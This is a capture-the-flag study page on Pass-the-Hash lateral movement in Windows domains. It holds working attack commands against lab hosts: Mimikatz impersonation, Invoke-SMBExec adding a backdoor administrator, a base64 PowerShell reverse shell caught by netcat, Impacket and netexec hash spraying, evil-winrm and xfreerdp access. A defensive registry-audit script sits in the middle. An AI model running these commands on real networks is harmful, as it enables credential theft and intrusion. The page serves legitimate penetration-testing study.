> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-lateral-movement/pass-the-hash-pth.md).

# Pass the Hash (PtH)

### Overview

Pass the Hash is a lateral movement technique where you authenticate with an NTLM hash directly; no plaintext password is needed. The NT hash stays the same until the password changes, and Windows doesn't salt it, so the hash itself is the credential.

**Where hashes come from:**

* SAM database dump from a compromised host
* NTDS.dit from a Domain Controller
* LSASS memory dump

***

### How NTLM Authentication Works

```
Client → sends username
Server → sends challenge (random value)
Client → encrypts challenge with NTLM hash → sends response
Server → verifies response
```

The response is computed from the hash, not from the password, and the hash does not change between sessions, so whoever holds the hash can authenticate without cracking it.

***

### From Windows

#### Mimikatz — sekurlsa::pth

Opens a new process (cmd.exe by default) running under the target user's context using their hash.

```cmd
mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit
```

| Parameter         | Purpose                                  |
| ----------------- | ---------------------------------------- |
| `/user`           | Username to impersonate                  |
| `/rc4` or `/NTLM` | NTLM hash                                |
| `/domain`         | Domain name (use `.` for local accounts) |
| `/run`            | Program to launch (default: `cmd.exe`)   |

A new cmd window opens — all commands run as `julio`.

***

#### Invoke-TheHash — SMB / WMI Execution

PowerShell tool. No local admin rights are required on the client side, but the impersonated user needs admin rights on the remote machine.

**Import module:**

```powershell
cd C:\tools\Invoke-TheHash\
Import-Module .\Invoke-TheHash.psd1
```

**SMB execution — create backdoor user:**

```powershell
Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose
```

**WMI execution — reverse shell:**

```powershell
# Start listener first
.\nc.exe -lvnp 8001

# Generate Base64 PowerShell payload at revshells.com
# PowerShell #3 (Base64), IP: 172.16.1.5, Port: 8001

Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e <base64_payload>"
```

| Method           | Use case                                            |
| ---------------- | --------------------------------------------------- |
| `Invoke-SMBExec` | Command execution via SMB (Service Control Manager) |
| `Invoke-WMIExec` | Command execution via WMI (stealthier)              |

***

### From Linux

#### Impacket — psexec

Uploads a service binary to the `ADMIN$` share, registers and starts it as a service, and returns a SYSTEM shell.

```bash
impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
```

> Format: `-hashes LM:NTLM` — if no LM hash, use `:NTLM` (colon prefix)

**Other Impacket PtH tools:**

```bash
impacket-wmiexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
impacket-smbexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
impacket-atexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
```

***

#### NetExec — Spray Across Subnet

Useful for checking hash reuse across multiple hosts. `Pwn3d!` in the output means the account has local admin rights on that target.

**Spray across subnet:**

```bash
netexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453
```

**Local accounts only (`--local-auth`):**

```bash
netexec smb 172.16.1.0/24 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453 --local-auth
```

**Execute command on target:**

```bash
netexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami
```

| Flag           | Meaning                                        |
| -------------- | ---------------------------------------------- |
| `-H`           | NTLM hash                                      |
| `-d .`         | Local account (dot = no domain)                |
| `--local-auth` | Try only local accounts, avoids domain lockout |
| `-x`           | Execute command                                |

***

#### evil-winrm — WinRM Access

Use when SMB is blocked or there is no admin share access. Requires WinRM (port 5985) to be open on the target.

```bash
evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453
```

**Domain account:**

```bash
evil-winrm -i 10.129.201.126 -u administrator@inlanefreight.htb -H 30B3783CE2ABF1AF70F77D0660CF3453
```

***

#### xfreerdp — RDP GUI Access

Requires **Restricted Admin Mode** enabled on target (disabled by default).

**Enable on target (requires existing access):**

```cmd
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
```

**Connect:**

```bash
xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B
```

***

### UAC Restriction — Local Accounts

UAC blocks remote PtH for local accounts by default. Only the **built-in Administrator (RID-500)** can do remote PtH unless the following registry value is set:

```
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy
```

| Value         | Effect                                       |
| ------------- | -------------------------------------------- |
| `0` (default) | Only RID-500 can do remote admin via PtH     |
| `1`           | All local admins can do remote admin via PtH |

> Domain accounts with admin rights are **not affected** by this restriction.
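Both registry values on this page (`DisableRestrictedAdmin` in the xfreerdp section and `LocalAccountTokenFilterPolicy` above) decide how far a stolen local hash reaches, so a defender wants to know their state across the fleet, including hosts where the value has never been created. The script below is an added example, not code from this page: it parses `reg query` output collected from several hosts (constructed transcripts, hostnames `WS01` to `WS03` are assumptions) and reports per host whether non-RID-500 local admins can authenticate remotely and whether Restricted Admin mode is on. An absent value is treated as its default as the page states it: token filtering on, Restricted Admin off.

```python
"""Fleet audit of LocalAccountTokenFilterPolicy and DisableRestrictedAdmin (added example).

Not code from the page. Input is the text of `reg query` runs collected from each host;
the transcripts below are constructed. Semantics follow the page:
  LocalAccountTokenFilterPolicy = 1 -> every local admin can do remote admin via PtH
  (absent or 0 -> only RID-500); DisableRestrictedAdmin = 0 -> Restricted Admin mode
  enabled for RDP (absent or 1 -> disabled).
"""
import re

POLICY_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
LSA_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"

# Constructed `reg query` transcripts, one string per host.
SAMPLE_EXPORTS = {
    "WS01": r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    LocalAccountTokenFilterPolicy    REG_DWORD    0x1
    EnableLUA    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    DisableRestrictedAdmin    REG_DWORD    0x0
""",
    # Neither value has ever been created on this host: both queries error out.
    "WS02": r"""
ERROR: The system was unable to find the specified registry key or value.
ERROR: The system was unable to find the specified registry key or value.
""",
    "WS03": r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    LocalAccountTokenFilterPolicy    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    DisableRestrictedAdmin    REG_DWORD    0x1
""",
}

# A value line in reg query output: indented name, REG_* type, data.
VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s+(.*)$")


def parse_reg_query(text):
    """Return {(key_path, value_name): raw_data} with key and name lower-cased."""
    values = {}
    current_key = None
    for line in text.splitlines():
        if not line.strip() or line.startswith("ERROR:"):
            continue
        if line.upper().startswith("HKEY_"):
            current_key = line.strip().lower()
            continue
        m = VALUE_LINE.match(line)
        if m and current_key:
            values[(current_key, m.group(1).lower())] = m.group(3).strip()
    return values


def dword(values, key, name):
    """Fetch a REG_DWORD as int; None when the value is absent from the transcript."""
    raw = values.get((key.lower(), name.lower()))
    return None if raw is None else int(raw, 0)   # reg query prints 0x-prefixed hex


def assess_host(text):
    values = parse_reg_query(text)
    token_filter = dword(values, POLICY_KEY, "LocalAccountTokenFilterPolicy")
    disable_ra = dword(values, LSA_KEY, "DisableRestrictedAdmin")
    return {
        "local_admin_pth_remote": token_filter == 1,   # absent -> RID-500 only
        "restricted_admin_enabled": disable_ra == 0,   # absent -> disabled
    }


def audit(exports):
    """Map host name -> assessment for a dict of collected transcripts."""
    return {host: assess_host(text) for host, text in exports.items()}


if __name__ == "__main__":
    for host, result in audit(SAMPLE_EXPORTS).items():
        flags = [k for k, v in result.items() if v] or ["default posture"]
        print(f"{host}: {', '.join(flags)}")
```

On the sample, `WS01` is the host to look at first: any local admin's hash works remotely and RDP accepts a hash through Restricted Admin mode, while `WS02` (values never created) and `WS03` (explicitly set to the defaults) are assessed identically, which is the point of treating a missing value as its documented default rather than as unknown.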

***

### Tool Selection Guide

| Scenario                            | Tool                        |
| ----------------------------------- | --------------------------- |
| On Windows, need a shell            | Mimikatz `sekurlsa::pth`    |
| On Windows, execute remote command  | Invoke-TheHash (SMB or WMI) |
| On Linux, need interactive shell    | `impacket-psexec`           |
| On Linux, spray hash across network | `netexec smb --local-auth`  |
| SMB blocked, WinRM open             | `evil-winrm`                |
| Need GUI access                     | `xfreerdp /pth`             |

***

### Attack Flow

```
Obtain NTLM hash (SAM / NTDS / LSASS)
        │
        ├── Windows foothold
        │       ├── Mimikatz sekurlsa::pth → spawns cmd as target user
        │       └── Invoke-TheHash → remote SMB/WMI command execution
        │
        └── Linux foothold
                ├── impacket-psexec     → SYSTEM shell via SMB
                ├── netexec --local-auth → spray, find reuse
                ├── evil-winrm          → PS shell via WinRM
                └── xfreerdp /pth       → GUI via RDP
```
